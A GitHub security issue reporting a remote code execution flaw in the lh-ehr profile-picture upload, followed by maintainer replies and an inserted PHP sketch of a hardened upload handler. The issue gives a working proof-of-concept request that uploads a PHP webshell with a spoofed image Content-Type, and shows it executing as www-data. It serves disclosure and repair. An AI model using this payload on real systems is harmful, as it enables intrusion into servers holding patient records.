
Security issue: Remote code execution via user picture upload #1223

Closed
C-Sto opened this issue Aug 11, 2018 · 6 comments
Labels: Web Security White Hat Reports, Cross Site SQL Injection, etc

Comments


C-Sto commented Aug 11, 2018

The Issue

Arbitrary file upload vulnerability allowing any user who can set profile pictures to execute code on the hosting system.

In lh-ehr, an attacker must be authenticated, and have sufficient privileges to upload a user profile picture (either for a user, or a patient) to perform this attack. It appears any valid user can perform this.

Issue location

Occurs at

if (move_uploaded_file($_FILES["profile_picture"]["tmp_name"], $destination_directory.$pid.".".$imageFileType)) {

POC:

POST /lh-ehr/interface/patient_file/summary/demographics.php?set_pid=153391 HTTP/1.1
Host: 192.168.9.142
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.9.142/lh-ehr/interface/patient_file/summary/demographics.php?set_pid=153391
Content-Type: multipart/form-data; boundary=---------------------------216243089528218
Content-Length: 252
Cookie: LibreHealthEHR=e2hroqj4n8d8odrds55bes4ui2
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------216243089528218
Content-Disposition: form-data; name="profile_picture"; filename="T03KD3TL5-U44DPA2RY-73f7cefa04dd-1000.php"
Content-Type: image/png

<?php echo `id`; ?>
-----------------------------216243089528218--

ubuntu@ubuntu:/var/www/html/lh-ehr/profile_pictures$ curl 127.0.0.1/lh-ehr/profile_pictures/153391.php
uid=33(www-data) gid=33(www-data) groups=33(www-data)
@naveen17797 (Contributor)

This bypasses the MIME type check, right?

C-Sto (Author) commented Aug 11, 2018

Yes, the MIME type is set by the 'Content-Type' specified by the user.

The code comments seem to indicate that an extension check is performed too, but that clearly isn't the case.
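As an added illustration of both points above (the extension taken from the client-supplied filename at the move_uploaded_file() call, and the MIME type being whatever Content-Type the client sent), here is a stand-alone PHP sketch, not lh-ehr's code, of the vulnerable pattern beside a hardened handler. The field name profile_picture, the $destination_directory.$pid naming and the move_uploaded_file() call are from the report; ALLOWED_IMAGE, MAX_BYTES, the function names and the constructed sample files are assumptions made for this example.

```php
<?php
// Added example, not lh-ehr code. "profile_picture", $destination_directory,
// $pid and move_uploaded_file() come from the issue; ALLOWED_IMAGE, MAX_BYTES,
// the function names and the sample files below are hypothetical.
declare(strict_types=1);

// Sniffed MIME type => extension the server will write. Neither the client's
// filename nor $_FILES[...]['type'] ever reaches this table.
const ALLOWED_IMAGE = ['image/png' => 'png', 'image/jpeg' => 'jpg', 'image/gif' => 'gif'];
const MAX_BYTES = 2 * 1024 * 1024;

// Vulnerable pattern from the report: the extension comes from the client's filename,
// so "evil.php" with Content-Type image/png is stored as <pid>.php and executed.
function vulnerableExtension(array $file): string
{
    return strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
}

// Hardened validation: returns the extension to store under, or throws.
function validateProfilePicture(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload error ' . (string)($file['error'] ?? 'none'));
    }
    if (($file['size'] ?? 0) <= 0 || $file['size'] > MAX_BYTES) {
        throw new RuntimeException('bad size');
    }
    $tmp = $file['tmp_name'];
    // Sniff the bytes on disk. $file['type'] is only the Content-Type the client
    // sent ("image/png" in the PoC) and is deliberately ignored.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmp);
    if ($mime === false || !isset(ALLOWED_IMAGE[$mime])) {
        throw new RuntimeException('not an allowed image type: ' . var_export($mime, true));
    }
    // Independent second check: the image decoder must agree with libmagic.
    $info = @getimagesize($tmp);
    if ($info === false || ($info['mime'] ?? null) !== $mime) {
        throw new RuntimeException('file does not parse as ' . $mime);
    }
    return ALLOWED_IMAGE[$mime];
}

// Request handler shape: only PHP-managed uploads, server-chosen destination name.
function storeProfilePicture(array $file, string $destination_directory, int $pid): string
{
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }
    $ext  = validateProfilePicture($file);
    $dest = rtrim($destination_directory, '/') . '/' . $pid . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('move failed');
    }
    chmod($dest, 0644); // never executable; the directory should also have PHP handling disabled
    return $dest;
}

// Stand-alone demo with constructed files (no HTTP request involved).
function fakeUpload(string $name, string $clientType, string $bytes): array
{
    $tmp = tempnam(sys_get_temp_dir(), 'up');
    file_put_contents($tmp, $bytes);
    return ['name' => $name, 'type' => $clientType, 'tmp_name' => $tmp,
            'error' => UPLOAD_ERR_OK, 'size' => strlen($bytes)];
}

// Constructed inputs: a real 1x1 PNG, the PoC webshell, and a PNG/PHP polyglot.
$png1x1 = base64_decode('iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg==');
$cases = [
    'real.png' => fakeUpload('real.png', 'image/png', $png1x1),
    'webshell' => fakeUpload('T03KD3TL5-U44DPA2RY-73f7cefa04dd-1000.php', 'image/png', "<?php echo `id`; ?>"),
    'polyglot' => fakeUpload('x.php', 'image/png', $png1x1 . "<?php echo `id`; ?>"),
];
foreach ($cases as $label => $file) {
    $vuln = vulnerableExtension($file);
    try {
        printf("%-8s vulnerable ext=%-3s hardened ext=%s\n", $label, $vuln, validateProfilePicture($file));
    } catch (RuntimeException $e) {
        printf("%-8s vulnerable ext=%-3s hardened: REJECTED (%s)\n", $label, $vuln, $e->getMessage());
    }
    unlink($file['tmp_name']);
}
```

Run it with the php CLI; no web server is involved. The third case is the one to notice: a valid PNG with PHP appended passes both finfo and getimagesize, so content sniffing alone is not the fix. What stops execution is that the stored name is $pid plus an extension chosen from the server-side allowlist, never from the client's filename, and, as a second layer, serving profile_pictures/ with PHP handling disabled (for mod_php, for instance, php_admin_flag engine off in that directory's Apache configuration).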

@naveen17797 (Contributor)

I coded that module; seems like I missed some check.

@naveen17797 (Contributor)

Definitely missed the extension check.

@aethelwulffe (Contributor)

Good job @C-Sto
Welcome aboard!
-Art

@muarachmann (Member)

Great @C-Sto, @naveen17797 you've got this 😃

@tmccormi tmccormi added the Web Security White Hat Reports, Cross Site SQL Injection, etc label Sep 5, 2018